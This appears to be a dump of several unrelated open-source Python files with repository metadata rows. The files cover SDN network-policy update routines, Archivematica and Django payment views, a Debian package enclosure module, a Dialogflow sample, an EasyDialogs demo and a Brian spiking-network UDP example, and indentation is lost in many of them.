minus_internal_delta, minus_edge_delta,
current_priority, current_version)
# FIXME: I suspect this is broken since we ignore the induced subgraph
# and induced subpolicy
def island_update(topology, new_policy):
"""
precondition: Assumes that only one island update is performed,
and no subspace updates have been performed. This assumption is
forced by our use of VLAN tags instead of MPLS labels
provides per-packet
"""
inst.stats.tally_update(new_policy)
log.info("Island update")
old_policy = inst.current_abstract_policy
# Switches which didn't change in new policy
nops = set( s1 for s1, c1 in old_policy \
if switch_covered(c1, new_policy[s1]))
# Everything else
new = set(topology.switches()) - nops
old = set()
fixpoint = island_fixpoint(topology, new_policy)
while new:
additions = fixpoint(new, old)
old |= new
new = additions
mods = old
subpolicy = restrict_policy(mods, new_policy)
boundary = nx.edge_boundary(topology, mods)
fake_edge_ports = \
[topology.node[x]['ports'][y] for (x,y) in boundary \
if topology.node[y]['isSwitch']]
# retrieve current data from inst
current_internal_policy = inst.current_internal_policy
current_edge_policy = inst.current_edge_policy
current_version = inst.current_version
current_priority = inst.current_priority
# calculate new version and priority
new_version = current_version + 1
new_priority = current_priority - 1
# Have to manually construct the correct edge policies by
# distinguishing between "true" edge ports to hosts and "fake"
# edge ports to other switches running the old version.
internal_policy, edge_policy = \
mk_versioned_policies(subpolicy, new_version, new_priority, topology,
old_version=current_version,
fake_edge_ports=fake_edge_ports)
old_internal_policy = restrict_policy(mods, current_internal_policy)
old_edge_policy = restrict_policy(mods, current_edge_policy)
return UpdateObject(internal_policy, edge_policy,
old_internal_policy,
old_edge_policy,
new_priority, new_version)
def subspace_update(topology, new_policy):
"""
precondition: none
provides per-packet
"""
log.info("Fixpoint subspace update")
inst.stats.tally_update(new_policy)
if DEBUG:
log.debug("Installing new policy: " + str(new_policy))
old_policy = inst.current_abstract_policy
# Correctness argument:
# * dels[s] = { r in c[s] | not covered(r) }
# * nops[s] = { r in c[s] | covered(r) } (* = c[s] \ dels[s] *)
# * mods[s] = { r' in c'[s] | not exist a rule r in nops[s].
# r ~ r' and actions(r) = actions(r') }
# Note that we can derive dels and nops from mods:
# nops'[s] = { r in c[s] | forall r' in c'[s] - mods'[s].
# if r' ~ r then actions(r) = actions(r')
# dels' = c \ nops'
# Lemma: if mods' = mods, then nops' = nops and dels' = dels
# Next, close mods under forwards and backwards reachability
# By construction, every rule in nops covers some rule in new
dels = NetworkPolicy()
for s1, c1 in old_policy:
dels[s1] = SwitchConfiguration([r for r in c1 \
if not covered(r, new_policy[s1])])
nops = NetworkPolicy()
for s1, c1 in old_policy:
nops[s1] = c1 - dels[s1]
mods = NetworkPolicy()
for s1, c1 in new_policy:
mods[s1] = SwitchConfiguration([r1 for r1 in c1 \
if not covered(r1, nops[s1])])
fixpoint = subspace_fixpoint(topology)
remainder = new_policy - mods
edge = mods
while True:
log.debug("Entering fixpoint")
remainder, edge = fixpoint(remainder, edge)
log.debug("Finished fixpoint")
if (not edge):
break
# Need to compute mapping from new rules to old rules that cover
mods = new_policy - remainder
new_version = inst.current_version + 1
new_priority = inst.current_priority - 1
plus_internal_delta, plus_edge_delta = \
mk_versioned_policies(mods, new_version, new_priority, topology)
minus_internal_delta, minus_edge_delta = concrete_rules(dels)
return UpdateObject(plus_internal_delta, plus_edge_delta,
minus_internal_delta, minus_edge_delta,
new_priority, new_version)
def full_per_packet_update(topology, new_policy, old_version=None):
"""
* precondition: none
* provides per-packet
"""
# update stats
log.debug("Full update!")
if DEBUG:
log.debug("New policy:" + str(new_policy))
inst.stats.tally_update(new_policy)
# calculate new version and priority
new_version = inst.current_version + 1
new_priority = inst.current_priority - 1
# create versioned policies for internal and edge traffic
internal_policy, edge_policy = \
mk_versioned_policies(new_policy, new_version, new_priority, topology,
old_version=old_version)
return UpdateObject(internal_policy, edge_policy,
inst.current_internal_policy,
inst.current_edge_policy,
new_priority, new_version)
#############################
# OPTIMIZATIONS SUBROUTINES #
#############################
def connects(r1, s1, r2, s2, topology):
"""
We say that a rule r1 on switch s1 "connects" to a rule r2 on a switch s2
under a configuration c if:
* r1's actions forward packets to output port p1
* the topology connects output port p1 on s1 to input port p2 on s2
* the in_port constraint in r2's pattern is either p2 or wildcard
* updating r1's pattern with modifications mentioned in r1's actions
yields a pattern whose intersection with r2's pattern is non-empty
"""
    for out_port, pkt in r1.apply(r1.pattern):
new_switch, in_port = topology.node[s1]['port'][out_port]
if new_switch == s2:
if r2.pattern.intersects(pkt):
return True
return False
# Need to know how many ports this switch has to see if the in_port
# wildcard is covered
def covered(r, config):
"""
Given a rule r in c[s], we say that r is covered, written covered(r)
if the following condition holds:
there exists a subset rs' of c'[s].
(for every rule r' in rs'. actions(r) = actions(r')) and
pattern(rs') == pattern(r)
"""
    # FIXME: We cheat for optimization here.  I know that I never split
    # rules, so a rule is covered exactly when there is a new rule with the
    # exact same pattern and action.
return config.contains_matching_rule(r)
# return set_covers(covers(r, config), r)
def set_covers(rs, r):
ps = []
for r1 in rs:
if not list_eq(r1.actions, r.actions):
return False
else:
ps.append(r1.pattern)
return set_covers_pattern(ps, r.pattern)
def set_covers_pattern(ps, p):
"""
Approximates set covering. If p has a wildcard, then one of the
patterns must have a wildcard
"""
for header, value in p:
match = False
if value == Pattern.WILD:
for p1 in ps:
if p1[header] == Pattern.WILD:
match = True
break
else:
for p1 in ps:
if p1[header] == value:
match = True
                else:
match = False
break
if not match:
return False
return True
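# Example (illustrative, other headers elided): ps = [{IN_PORT: 1},
# {IN_PORT: WILD}] covers p = {IN_PORT: WILD} because some pattern carries
# the wildcard, while ps = [{IN_PORT: 1}, {IN_PORT: 2}] does not.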
def covers(r, config):
"""
Given a rule r in c[s], we say r' is in covers(r) if: r' is in
c'[s] and actions(r) = actions(r') and pattern(r') ~ pattern(r)
"""
assert(isinstance(r, Rule))
covering = set()
for rule in config:
if rule.pattern <= r.pattern:
if not list_eq(rule.actions, r.actions):
return set()
covering.add(rule)
return covering
def list_of_covers(rs, config):
return set(rule for r in rs for rule in covers(r, config))
class flow_space(object):
def __init__(self, flows=None):
if isinstance(flows, list):
self.__pkts__ = defaultdict(set)
for sw, p, pkt, rule in flows:
if pkt.in_port != p:
new_pkt = Pattern(pkt, in_port=p)
else:
new_pkt = pkt
self.__pkts__[sw].add((new_pkt, rule))
elif isinstance(flows, dict):
self.__pkts__ = flows.copy()
else:
self.__pkts__ = defaultdict(set)
def add(self, sw, pkt, rule):
self.__pkts__[sw].add((pkt, rule))
def __getitem__(self, switch):
return self.__pkts__[switch]
def __setitem__(self, switch, value):
self.__pkts__[switch] = value
def __iter__(self):
return self.__pkts__.iterkeys()
def __and__(self, other):
""" Right biased intersection: takes rules from other """
intersection = flow_space()
for switch in self:
for pkt, _ in self[switch]:
for pkt2, rule2 in other[switch]:
if pkt.intersects(pkt2):
if pkt <= pkt2:
intersection.add(switch, pkt, rule2)
else:
intersection.add(switch, pkt2, rule2)
return intersection
def __or__(self, other):
union = flow_space()
for switch in self:
union[switch] = self[switch] | other[switch]
return union
def apply_topology(self, topology):
"""
Transfers each located packets lp = (port, pkt) in outgoing to
port' such that (port, port') is in graph
"""
for switch in self:
outgoing = self[switch]
output = flow_space([])
for pkt, rule in outgoing:
port = pkt.IN_PORT
(target_switch, target_port) = topology.node[switch]['port'][port]
if not (target_switch in topology.node
and topology.node[target_switch]['isSwitch']):
continue
pkt = Pattern(pkt, IN_PORT=target_port)
output.add(target_switch, pkt, rule)
return output
def rules(self):
"""
Returns a policy representing the rules contributing to the flow space
"""
policy = NetworkPolicy()
for switch in self:
config = SwitchConfiguration()
for _, rule in self[switch]:
config.add_rule(rule)
policy[switch] = config
return policy
def rng(policy, topology):
_range = flow_space()
for switch in policy:
for rule in policy[switch]:
for port, pkt in rule.apply(rule.pattern):
(target_switch, target_port) = topology.node[switch]['port'][port]
pkt = Pattern(pkt, IN_PORT=target_port)
_range.add(target_switch, pkt, rule)
return _range
def dom(policy):
_dom = flow_space()
for switch in policy:
for rule in policy[switch]:
_dom.add(switch, rule.pattern, rule)
return _dom
def subspace_fixpoint(topology):
def fixpoint(rest, edge):
edge_domain = dom(edge)
edge_range = rng(edge, topology)
rest_domain = dom(rest)
rest_range = rng(rest, topology)
new_edge = ((edge_domain & rest_range) | (edge_range & rest_domain)).rules()
return (rest - new_edge, new_edge)
return fixpoint
def switch_covered(old_config, new_config):
"""
Given a switch s, we say that s is covered, written covered(s)
if the following condition holds:
for every r' in c'[s], r' is in covers(r) for some r in c[s]
for every r in c[s], covered(r)
"""
covering = []
for r1 in old_config:
if not covered(r1, new_config):
return False
cover = covers(r1, new_config)
covering += cover
for r2 in new_config:
if not r2 in covering:
return False
return True
# TODO: Figure out how to make edge_ports and edge_switches work
# Idea: The set-at-a-time algorithm for subset update was super fast, but it's not clear how to do the same for island updates.
def island_fixpoint(topology, new_policy):
def fixpoint(new, old):
mods_set = new | old
addition = set()
for a in (new | old):
mods_set.remove(a)
for b in (new | old):
if (a in old and b in old):
continue
if a != b:
mods_set.remove(b)
for rule in new_policy[a]:
p = rule.pattern
path = find_path(topology, new_policy, mods_set, p, a, b)
if path:
mods_set |= path
addition |= path
mods_set.add(b)
mods_set.add(a)
return addition
return fixpoint
def restrict_policy(switches, policy):
new_policy = NetworkPolicy()
for s in switches:
new_policy[s] = policy[s]
return new_policy
def rules_intersect(r1, r2):
return r1.pattern.intersects(r2.pattern)
def sorted_list_diff(l1, l2):
""" Computes l1 - l2. Assumes l1 and l2 are sorted """
# TODO: This would be much simpler as a loop or fold
diff = []
l1_iter = iter(l1)
l2_iter = iter(l2)
l1_done = False
l2_done = False
# Get the first item from each list
try:
item1 = l1_iter.next()
except StopIteration:
l1_done = True
try:
item2 = l2_iter.next()
except StopIteration:
l2_done = True
while not (l1_done or l2_done):
if item1 < item2:
diff.append(item1)
try:
item1 = l1_iter.next()
except StopIteration:
l1_done = True
break
elif item1 == item2:
try:
item1 = l1_iter.next()
except StopIteration:
l1_done = True
break
else:
try:
item2 = l2_iter.next()
except StopIteration:
l2_done = True
break
# post condition: l1_done \/ l2_done
if l1_done:
return diff
else:
while not l1_done:
try:
diff.append(l1_iter.next())
except StopIteration:
l1_done = True
return diff
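# A minimal alternative sketch for the TODO above: the same sorted-list
# difference expressed as a single index-based merge loop. Kept here as a
# reference only; `sorted_list_diff` above remains the version in use.
def sorted_list_diff_simple(l1, l2):
    """Computes l1 - l2 with a single merge-style loop. Assumes sorted inputs."""
    diff = []
    i, j = 0, 0
    while i < len(l1) and j < len(l2):
        if l1[i] < l2[j]:
            diff.append(l1[i])  # only in l1: keep it
            i += 1
        elif l1[i] == l2[j]:
            i += 1              # present in both: skip (mirrors the original)
        else:
            j += 1              # l2 is behind: advance it
    diff.extend(l1[i:])         # whatever remains in l1 is not in l2
    return diff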
def two_phase_update(topology, update):
# if necessary, garbage collect priorities
if inst.current_priority == 0:
priority_garbage_collect()
plus_edge_policy = update.plus_edge_policy
minus_edge_policy = update.minus_edge_policy
plus_internal_policy = update.plus_internal_policy
minus_internal_policy = update.minus_internal_policy
new_priority = update.new_priority
new_version = update.new_version
modify_edge_policy = \
plus_edge_policy.pattern_intersect(inst.current_edge_policy)
install_edge_policy = \
plus_edge_policy.pattern_diff(inst.current_edge_policy)
uninstall_edge_policy = minus_edge_policy.pattern_diff(modify_edge_policy)
# (1) install internal policy
if DEBUG:
log.debug("Installing new internal policy: \n" + str(plus_internal_policy))
install(plus_internal_policy)
# TODO: Wait for rules to be installed
# (2) install edge policy
if DEBUG:
log.debug("Installing new edge policy: \n" + str(install_edge_policy))
install(install_edge_policy)
if DEBUG:
log.debug("Modifying old edge policy: \n" + str(modify_edge_policy))
modify_policy(modify_edge_policy)
# (3) remove old edge policy
if DEBUG:
log.debug("Uninstalling old edge policy: \n" + str(uninstall_edge_policy))
uninstall(uninstall_edge_policy)
# TODO: Wait for packets to leave
# (4) remove old internal policy
if DEBUG:
log.debug("Uninstalling old internal policy: \n" \
+ str(minus_internal_policy))
uninstall(minus_internal_policy)
# update inst with new data
inst.current_internal_policy = \
(inst.current_internal_policy + plus_internal_policy).pattern_diff(minus_internal_policy)
inst.current_edge_policy = \
(inst.current_edge_policy + install_edge_policy + modify_edge_policy).pattern_diff(uninstall_edge_policy)
inst.current_version = new_version
inst.current_priority = new_priority
    inst.current_topo = topology
return
def end_flow(switch, flow):
"""
* called by NOX when a flow is removed from a switch
* deletes flow if it is in inst.active_flows
* note that not all flows are tracked in inst.active_flows
"""
active_flows = inst.active_flows
    if (switch in active_flows and flow in active_flows[switch]):
active_flows[switch].remove(flow)
if active_flows[switch] == []:
del active_flows[switch]
return
def refine_flows(flow_window, refine, refine_window, priority):
"""
* refines active flows into smaller flows
* invoked on a timer from per_flow_update
* flow_window: time window between flows
* refine: function from a pattern to a list of patterns
- must denotes the same fragment of flowspace!
* refine_window: timer for invoking refine_flows
* priority: priority flows currently installed at
"""
new_active_flows = {}
    for switch, flows in inst.active_flows.items():
new_flows = []
for (pattern, actions) in flows:
for new_pattern in refine(pattern):
                new_flows.append((new_pattern, actions))
install_rule(switch, new_pattern, actions, priority,
flow_window)
delete_rules(switch, pattern.to_dict(), priority)
if new_flows:
new_active_flows[switch] = new_flows
inst.active_flows = new_active_flows
if new_active_flows:
inst.post_callback(refine_window,
lambda:refine_flows(flow_window, refine,
refine_window, priority))
return
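# Hypothetical example of a `refine` argument for refine_flows (the header
# field used here is an assumption for illustration): split each pattern into
# finer patterns that together denote the same fragment of flow space.
#
#     def refine_by_srcip_parity(pattern):
#         return [Pattern(pattern, srcip_lsb=0), Pattern(pattern, srcip_lsb=1)]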
def config_domain(config):
"""
The domain of a configuration is the flow-space that matches a rule
in the configuration. For efficiency, should change this to be
sorted
"""
return set( rule.pattern for rule in config )
# return reduce_flow_space(domain)
def config_range(config):
return [ pat for rule in config for pat in rule.apply(rule.pattern) ]
def concrete_rules(policy):
concrete_edge_policy = NetworkPolicy()
concrete_internal_policy = NetworkPolicy()
for switch, config in policy:
concrete_edge_policy[switch] = SwitchConfiguration()
concrete_internal_policy[switch] = SwitchConfiguration()
for rule in config:
for conc_rule in inst.concrete_policy[switch][rule]:
if conc_rule.edge:
concrete_edge_policy[switch].add_rule(conc_rule)
else:
concrete_internal_policy[switch].add_rule(conc_rule)
return concrete_internal_policy, concrete_edge_policy
def is_not_reachable(delta, old, graph):
"""
Checks that no traffic from the old configuration can reach new rules
"""
old_domain = defaultdict(set)
old_range = defaultdict(set)
new_domain = defaultdict(set)
new_range = defaultdict(set)
# Check non-intersecting domains
for switch, config in old:
if not switch in delta:
# new_domain[switch] = []
# new_range[switch] = []
continue
else:
old_domain[switch] = config_domain(config)
old_range[switch] = config_range(config)
new_domain[switch] = config_domain(delta[switch])
new_range[switch] = config_range(delta[switch])
# Check non-reachability
for switch, rng in old_range.iteritems():
one_hop = apply_topology(switch, rng, graph)
for new_switch in one_hop:
if flows_intersecting(new_domain[new_switch], one_hop[new_switch]):
return False
return True
def find_path(graph, policy, forbidden, patt, src, dst):
assert isinstance(patt, Pattern)
# Does a DFS search
stack = [(set(), src, patt)]
while stack:
path, sw, pkt = stack.pop()
conf = policy[sw]
rule = conf[pkt]
outgoing = rule.apply(pkt)
try:
incoming = apply_topology(sw, outgoing, graph)
except KeyError:
continue
for sw, pkts in incoming.iteritems():
if sw == dst:
return path
if sw in forbidden:
continue
for pkt in pkts:
new_path = path.copy()
new_path.add(sw)
stack.append((new_path, sw, pkt))
return None
def apply_topology(switch, outgoing, graph):
"""
Transfers each located packets lp = (port, pkt) in outgoing to
port' such that (port, port') is in graph
"""
output = defaultdict(set)
for pkt, port in outgoing:
(target_switch, target_port) = graph.node[switch]['port'][port]
if not (target_switch in graph.node
and graph.node[target_switch]['isSwitch']):
continue
pkt = Pattern(pkt, IN_PORT=target_port)
output[target_switch].add(pkt)
return output
def flows_intersecting(flows1, flows2):
"""
Tests whether any of the patterns in flow1 and flow2 have packets
in common
"""
# TODO: Make args ordered
# TODO: Right now this assumes that patterns have the same "granularity" as in our examples. Need to uncomment to return to general case.
# for flow1 in flows1:
# for flow2 in flows2:
# if flow1 <= flow2 or flow2 <= flow1:
# return True
# return False
return bool(flows1 & flows2)
| XianliangJ/collections | CNUpdates/updates/update_lib.py | Python | gpl-3.0 | 49,836 | 0.00602 |
# This file is part of Archivematica.
#
# Copyright 2010-2013 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
from django.http import HttpResponse
from contrib.mcp.client import MCPClient
from lxml import etree
def execute(request):
result = ''
if 'uuid' in request.REQUEST:
client = MCPClient()
uuid = request.REQUEST.get('uuid', '')
choice = request.REQUEST.get('choice', '')
uid = request.REQUEST.get('uid', '')
result = client.execute(uuid, choice, uid)
return HttpResponse(result, mimetype = 'text/plain')
def list(request):
client = MCPClient()
jobs = etree.XML(client.list())
response = ''
    if len(jobs) > 0:
for job in jobs:
response += etree.tostring(job)
response = '<MCP>%s</MCP>' % response
return HttpResponse(response, mimetype = 'text/xml')
| michal-ruzicka/archivematica | src/dashboard/src/components/mcp/views.py | Python | agpl-3.0 | 1,507 | 0.005309 |
# Copyright (C) Anton Liaukevich 2011-2020 <leva.dev@gmail.com>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
'''Package "enclosure" structure description and processing'''
from lxml import etree
from .errors import *
class EveryError(Error): pass
class EveryAndDistinctError(EveryError): pass
class VersionsEveryAndDistinctError(EveryAndDistinctError): pass
class ArchAndVersionsEveryAndDistinctError(EveryAndDistinctError): pass
class CannotEnumerateEvery(EveryError): pass
class CannotAddExistingPackage(Error): pass
class EnclosureImportSyntaxError(XmlImportSyntaxError):
'''Syntax or semantic error while enclosure structure parsing'''
class Versions:
def __init__(self, isevery=False):
self.__isevery = isevery
self.__items = set()
@property
def isevery(self):
return self.__isevery
def __iter__(self):
if self.isevery:
            raise CannotEnumerateEvery("Cannot enumerate every possible versions")
return iter(self.__items)
def __contains__(self, version):
return self.isevery or version in self.__items
def add(self, version):
if self.isevery:
raise VersionsEveryAndDistinctError("You must not add distinct versions where every added")
self.__items.add(version)
class ArchAndVersions:
def __init__(self, isevery=False):
self.__every = Versions() if isevery else None
self.__data = {}
@property
def isevery(self):
return self.__every is not None
@property
def every(self):
return self.__every
@every.setter
def every(self, value):
self.__every = value
def __iter__(self):
if self.isevery:
            raise CannotEnumerateEvery("Cannot enumerate every possible architectures and versions")
return iter(self.__data.items())
def has_arch_version(self, arch, version):
if self.isevery:
return version in self.every
else:
#TODO: Is it right?
try:
return version in self.__data[arch]
except KeyError:
try:
return version in self.__data["all"]
except KeyError:
return False
def add(self, versions, arch=None):
if self.every:
assert arch is None
self.every = versions
else:
assert arch is not None
self.__data[arch] = versions
def add_single(self, version, arch=None):
if self.every:
assert arch is None
self.every.add(version)
else:
assert arch is not None
try:
self.__data[arch].add(version)
except KeyError:
versions = Versions()
versions.add(version)
self.__data[arch] = versions
class Enclosure:
def __init__(self):
self.__packages = {}
def __iter__(self):
return iter(self.__packages)
def __contains__(self, package):
try:
return self.__packages[package.name].has_arch_version(package.architecture, package.version)
except KeyError:
return False
def clear(self):
self.__packages.clear()
def add_package(self, name, arch_and_versions):
if name in self.__packages:
            raise CannotAddExistingPackage("Package '{0}' is already in the enclosure".format(name))
self.__packages[name] = arch_and_versions
def add_versioned_package(self, versioned):
try:
self.__packages[versioned.name].add_single(versioned.version, versioned.architecture)
except KeyError:
arch_and_versions = ArchAndVersions()
arch_and_versions.add_single(versioned.version, versioned.architecture)
self.__packages[versioned.name] = arch_and_versions
def export_to_xml(self, file):
root = etree.Element("enclosure")
for pkg, arch_and_versions in sorted(self.__packages.items(), key=lambda x: x[0]):
if arch_and_versions.isevery and arch_and_versions.every.isevery:
etree.SubElement(root, "fullpackage", name=pkg)
else:
package_element = etree.SubElement(root, "package", name=pkg)
if arch_and_versions.isevery:
everyarch_element = etree.SubElement(package_element, "everyarch")
for version in sorted(arch_and_versions.every):
etree.SubElement(everyarch_element, "version", number=version)
else:
for arch, versions in sorted(arch_and_versions, key=lambda x: x[0]):
arch_element = etree.SubElement(package_element, "arch", name=arch)
if versions.isevery:
etree.SubElement(arch_element, "everyversion")
else:
for version in sorted(versions):
etree.SubElement(arch_element, "version", number=version)
tree = etree.ElementTree(root)
tree.write(file, pretty_print=True, encoding="UTF-8", xml_declaration=True)
def import_from_xml(self, file):
try:
root = etree.parse(file).getroot()
self.clear()
for fullpackage_element in root.findall("fullpackage"):
arch_and_versions = ArchAndVersions(isevery=True)
arch_and_versions.every = Versions(isevery=True)
self.add_package(fullpackage_element.get("name"), arch_and_versions)
for package_element in root.findall("package"):
everyarch_element = package_element.find("everyarch")
if everyarch_element is not None:
arch_and_versions = ArchAndVersions(isevery=True)
everyversion_element = everyarch_element.find("everyversion")
if everyversion_element is not None:
arch_and_versions.every = Versions(isevery=True)
else:
versions = Versions()
for version_element in everyarch_element.findall("version"):
versions.add(version_element.get("number"))
arch_and_versions.add(versions)
else:
arch_and_versions = ArchAndVersions()
for arch_element in package_element.findall("arch"):
everyversion_element = arch_element.find("everyversion")
if everyversion_element is not None:
arch_and_versions.add(Versions(isevery=True), arch_element.get("name"))
else:
versions = Versions()
for version_element in arch_element.findall("version"):
versions.add(version_element.get("number"))
arch_and_versions.add(versions, arch_element.get("name"))
self.add_package(package_element.get("name"), arch_and_versions)
except (ValueError, LookupError, etree.XMLSyntaxError) as err:
            raise EnclosureImportSyntaxError('Syntax error encountered while importing '
                                             'enclosure structure from xml: ' + str(err))
class MixedEnclosure:
def __init__(self, *enclosures):
self.enclosures = [enclosure for enclosure in enclosures]
def __contains__(self, package):
for enclosure in self.enclosures:
if package in enclosure:
return True
return False
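# Minimal usage sketch (assumes a `versioned` object exposing .name, .version
# and .architecture attributes, as add_versioned_package expects):
#
#     enclosure = Enclosure()
#     enclosure.add_versioned_package(versioned)
#     mixed = MixedEnclosure(enclosure, other_enclosure)
#     assert versioned in mixed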
| saintleva/limited-apt | src/limitedapt/enclosure.py | Python | gpl-3.0 | 8,559 | 0.008062 |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteConversationDataset
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflow
# [START dialogflow_v2_generated_ConversationDatasets_DeleteConversationDataset_sync]
from google.cloud import dialogflow_v2
def sample_delete_conversation_dataset():
# Create a client
client = dialogflow_v2.ConversationDatasetsClient()
# Initialize request argument(s)
request = dialogflow_v2.DeleteConversationDatasetRequest(
name="name_value",
)
# Make the request
operation = client.delete_conversation_dataset(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
# [END dialogflow_v2_generated_ConversationDatasets_DeleteConversationDataset_sync]
| googleapis/python-dialogflow | samples/generated_samples/dialogflow_v2_generated_conversation_datasets_delete_conversation_dataset_sync.py | Python | apache-2.0 | 1,640 | 0.001829 |
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""
"""
__version__ = "$Id$"
#end_pymotw_header
import EasyDialogs
valid_responses = { 1:'yes',
0:'no',
-1:'cancel',
}
response = EasyDialogs.AskYesNoCancel('Select an option')
print 'You selected:', valid_responses[response]
| qilicun/python | python2/PyMOTW-1.132/PyMOTW/EasyDialogs/EasyDialogs_AskYesNoCancel.py | Python | gpl-3.0 | 390 | 0.012821 |
from rest_framework.response import Response
from rest_framework import status
from rest_framework import viewsets, mixins
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from rest_framework.decorators import api_view, permission_classes
from apps.payments.models import Installment, RentalPaymentInfo
from apps.markets.models import Market
from apps.booths.models import Booth
from apps.payments.serializers import InstallmentSerializer, UploadReceiptSerializer, VerifyReceiptSerializer
class PaymentViewSet(viewsets.GenericViewSet, mixins.CreateModelMixin):
"""
### Pay with bank account
{\n
"payment_type": 1,
"market": 1,
"payment_method": 2,
"amount": 2000
}
### Pay with credit card
{\n
"payment_type": 1,
"market": 1,
"payment_method": 1,
"amount": 2000,
"credit_card": 1
}
### Pay with new credit card
{\n
"payment_type": 1,
"market": 1,
"new_credit_card": {
"card_number": "123456789",
"card_holder_name": "Bee",
"type": 1,
"expiry_date": "2020-07-01",
"verification_no": "123"
},
"save_new_credit_card": true,
"payment_method": 1,
"amount": 2000
}
"""
queryset = Installment.objects.all()
serializer_class = InstallmentSerializer
permission_classes = (IsAuthenticated,)
class UploadReceiptViewSet(viewsets.GenericViewSet, mixins.RetrieveModelMixin, mixins.UpdateModelMixin):
queryset = Installment.objects.all()
serializer_class = UploadReceiptSerializer
permission_classes = (IsAuthenticated,)
class VerifyReceiptViewSet(viewsets.GenericViewSet, mixins.ListModelMixin, mixins.RetrieveModelMixin,
mixins.UpdateModelMixin):
queryset = Installment.objects.filter(payment_method=Installment.BANK_TRANSFER,
verification_status=Installment.PENDING)
serializer_class = VerifyReceiptSerializer
permission_classes = (IsAuthenticated, IsAdminUser)
@api_view(['GET', ])
@permission_classes((IsAuthenticated, ))
def get_payment_status(request, *args, **kwargs):
market_id = kwargs.get('pk', None)
market = Market.objects.filter(pk=market_id)
if len(market) == 0:
return Response('Market does not exist', status=status.HTTP_400_BAD_REQUEST)
booths = Booth.objects.filter(market=market)
response = []
for booth in booths:
payment_info = dict()
payment_info['booth_id'] = booth.pk
payment_info['booth_number'] = booth.booth_number
approved_reservations = booth.approved_reservations.all()
if len(approved_reservations) != 0:
approved_reservation = approved_reservations[0]
try:
rental_payment_info = approved_reservation.rental_payment_info
payment_info['payment_status'] = rental_payment_info.status
payment_info['vendor_id'] = rental_payment_info.user.id
payment_info['vendor_name'] = rental_payment_info.user.first_name + ' ' + rental_payment_info.user.last_name
            except RentalPaymentInfo.DoesNotExist:
payment_info['payment_status'] = 0
payment_info['vendor_id'] = approved_reservation.user.id
payment_info['vendor_name'] = approved_reservation.user.first_name + ' ' + approved_reservation.user.last_name
response.append(payment_info)
return Response(response, status=status.HTTP_200_OK)
| we-inc/mms-snow-white-and-the-seven-pandas | webserver/apps/payments/views.py | Python | mit | 3,518 | 0.002558 |
'''
Example of a spike receiver (only receives spikes)
In this example spikes are received and processed creating a raster plot at the end of the simulation.
'''
from brian import *
import numpy
from brian_multiprocess_udp import BrianConnectUDP
# The main function with the NeuronGroup(s) and Synapse(s) must be named "main_NeuronGroup".
# It will receive two objects: input_Neuron_Group and the simulation_clock. The input_Neuron_Group
# will supply the input spikes to the network. The size of the spike train received equals NumOfNeuronsInput.
# The size of the output spike train equals NumOfNeuronsOutput and must be the same size of the NeuronGroup who is
# going to interface with the rest of the system to send spikes.
# The function must return all the NeuronGroup objects, Synapse objects and (optionally) Monitor objects this way:
# ([list of all NeuronGroups],[list of all Synapses],[list of all Monitors])
# and the FIRST (index 0) NeuronGroup of the list MUST be the one where the OUTPUT spikes will be taken by the simulation.
#
# Here is also possible to use "dummy" NeuronGroups only to receive and/or send spikes.
my_neuron_input_number = 100
def main_NeuronGroup(input_Neuron_Group, simulation_clock):
print "main_NeuronGroup!" #DEBUG!
simclock = simulation_clock
Nr=NeuronGroup(my_neuron_input_number, model='v:1', reset=0, threshold=0.5, clock=simclock)
Nr.v=0
# SYNAPSES BETWEEN REAL NEURON NETWORK AND THE INPUT
Syn_iNG_Nr=Synapses(input_Neuron_Group, Nr, model='w:1', pre='v+=w', clock=simclock)
Syn_iNG_Nr[:,:]='i==j'
print "Total Number of Synapses:", len(Syn_iNG_Nr) #DEBUG!
Syn_iNG_Nr.w=1
MExt=SpikeMonitor(Nr) # Spikes sent by UDP
Mdummy=SpikeMonitor(input_Neuron_Group) # Spikes received by UDP
return ([Nr],[Syn_iNG_Nr],[MExt,Mdummy])
def post_simulation_function(input_NG, simulation_NG, simulation_SYN, simulation_MN):
"""
input_NG: the neuron group that receives the input spikes
simulation_NG: the neuron groups list passed to the system by the user function (main_NeuronGroup)
simulation_SYN: the synapses list passed to the system by the user function (main_NeuronGroup)
simulation_MN: the monitors list passed to the system by the user function (main_NeuronGroup)
This way it is possible to plot, save or do whatever you want with these objects after the end of the simulation!
"""
figure()
raster_plot(simulation_MN[1])
title("Spikes Received by UDP")
show(block=True)
# savefig('output.pdf')
if __name__=="__main__":
my_simulation = BrianConnectUDP(main_NeuronGroup, NumOfNeuronsInput=my_neuron_input_number, post_simulation_function=post_simulation_function,
input_addresses=[("127.0.0.1", 18181, my_neuron_input_number)], simclock_dt=1, inputclock_dt=2, TotalSimulationTime=10000, sim_repetitions=0, brian_address=2)
